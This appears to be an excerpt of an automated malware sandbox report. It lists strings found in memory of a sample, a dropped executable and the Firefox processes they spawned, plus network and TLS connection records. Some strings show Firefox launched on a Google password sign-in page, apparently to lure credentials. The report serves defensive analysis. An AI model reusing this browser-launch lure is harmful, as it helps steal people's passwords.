Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001A.00000002.3247984693.0000019E4B65C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3114034660.0000019E53E92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3145093267.0000019E53DAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.google.com/policies/privacy/2
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: file.exe, 00000000.00000003.2198542260.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2925963340.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3088747282.000000000600F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3218314542.00000045F65BC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000003.3148359277.0000019E53B5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000001A.00000003.3185200055.0000019E4CF66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3213102299.0000019E4CF70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3191592344.0000019E4CF7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarPrefs.sys.mjsresource:///modules/Urlba
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 0000001A.00000002.3218314542.00000045F65BC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3228922756.0000019E471AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.openh264.org//
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/ce
Source: 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.widevine.com/3
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E025000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD44000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3230691472.0000019E47D15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001A.00000003.3165170400.0000019E4E042000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47039000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.3068054846.000001E80615F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3075536770.000001C6A6E09000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3223563743.0000019E3B669000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdBoolean
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmatch
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountincrementModificationCountstrippedUrlToTopPrefixAndTitlesuggestedIndexRes
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50106 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50117 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
